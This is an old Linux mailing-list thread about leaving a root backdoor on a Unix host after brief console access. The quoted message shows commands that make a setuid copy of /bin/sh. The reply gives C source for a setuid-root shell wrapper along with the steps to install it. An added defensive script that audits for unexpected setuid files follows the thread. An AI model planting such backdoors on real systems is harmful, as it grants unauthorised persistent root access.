
Re: Hi all,



On Fri, 18 Jun 1999 sudheer@xxxxxxxxxxxxx wrote:

> > 
> > Rebooting the machine and changing root password is a very long shot. A
> > hacker can root the account simply by sitting on the console when root has
> > gone for a pee. Try this:
> > 
> > root>cp /bin/sh /bin/mysh
> > root>chmod +s /bin/mysh
> > root>chmod +x /bin/mysh 'may not be required.
> > 
> > That's all, now go away and login as any user from anywhere in the
> > world,
> > 
> > anyuser>whoami
> > anyuser
> > anyuser>/bin/mysh
> > anyuser>whoami
> > root
> 
>     This won't work. The shells are more intelligent nowadays.
>   They behave according to the uid of the process invoking the shell,
>   just like that of a 'passwd' program. Even though the setuid bit is
>   set for the 'passwd' program, a normal user can't change the passwd of
>   another user even if he knows the other person's passwd.
> 
>   Please correct me if I am wrong.
> 
> sudheer


OK, it might not work in bash, but the simple wrapper program would:

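#include <unistd.h>

int main(void)
{
    /* set real and effective uid/gid to root, then exec the shell */
    setuid(0); setgid(0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1; /* reached only if execl fails */
}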

Compile this program and make it setuid (chmod 4755 a.out) and run it
instead of bash.

Lokesh.

> 
> 
> --------------------------------------------------------------------
> For more information on Linux in India visit http://www.linux-india.org/
> Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
> Flame baits will not be tolerated.  If you can appreciate satire read
> http://www.templetons.com/brad/emily.html
> 
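
Added example, not part of the original thread: a defender's audit for the two tricks discussed above (the set-uid copy of /bin/sh and the compiled set-uid wrapper). It reports set-uid/set-gid files that are missing from a baseline list and marks the ones that are byte-for-byte copies of a shell; the function name audit_suid, the baseline format and the default shell list are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). audit_suid and the baseline format
# (one absolute path per line) are assumptions made for illustration.
#
# usage: audit_suid ROOT BASELINE [SHELL...]
# Prints "<tag> <path>" for every set-uid/set-gid regular file under ROOT
# that is not listed in BASELINE:
#   SHELL-COPY  content is identical to one of the given shells
#   UNLISTED    any other unexpected set-id file (e.g. a compiled wrapper)
# File names containing newlines are not handled.
audit_suid() {
    root=$1; baseline=$2; shift 2
    # default comparison set when no shells are named
    [ $# -gt 0 ] || set -- /bin/sh /bin/bash /bin/dash
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        # skip files the administrator has already accepted
        if grep -Fxq -- "$f" "$baseline" 2>/dev/null; then continue; fi
        tag=UNLISTED
        for s in "$@"; do
            if [ -f "$s" ] && cmp -s "$f" "$s"; then tag=SHELL-COPY; fi
        done
        printf '%s %s\n' "$tag" "$f"
    done
}

# run directly: sh audit.sh ROOT BASELINE [SHELL...]
if [ $# -ge 2 ]; then audit_suid "$@"; fi
```

The wrapper is not a copy of any shell, so only the baseline comparison catches it; that is why the baseline should be recorded from a known-good install and kept somewhere the audited host cannot modify.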

